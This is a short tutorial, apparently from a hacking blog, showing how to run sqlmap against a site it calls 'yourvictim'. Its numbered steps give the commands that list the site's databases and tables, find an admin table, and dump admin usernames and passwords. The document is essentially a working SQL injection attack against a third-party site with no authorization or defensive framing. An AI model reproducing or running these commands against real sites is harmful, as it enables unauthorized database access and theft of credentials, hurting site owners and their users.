Step 1: Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
Step 2: Now find the vulnerable site. (well I already have vulnerable site)
Step 3: Now type this command in the terminal and hit enter.(refer above figure)
(python sqlmap.py -u http://yourvictim’slink/index.php?id=4 –dbs)
Step 4: Now you will get the database name of the website
At now I got the two database aj and information_schema we will select aj database.
Step 5: Now get the tables of the database as to it you have to enter this command into the terminal and simply hit Enter.
(python sqlmap.py -u http://yourvictim’slink/index.php?id=4 -D (database name) –tables)
Step 6: Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
(python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -D aj –tables)
Step 7: Now you will get the tables list which is stored in aj database.
Step 8: Now lets grab the columns from the admin table
(python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin –columns)
Now we got the columns and we got username and password
Step 9: Now let’s grab the passwords of the admin
(python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin -U test –dump)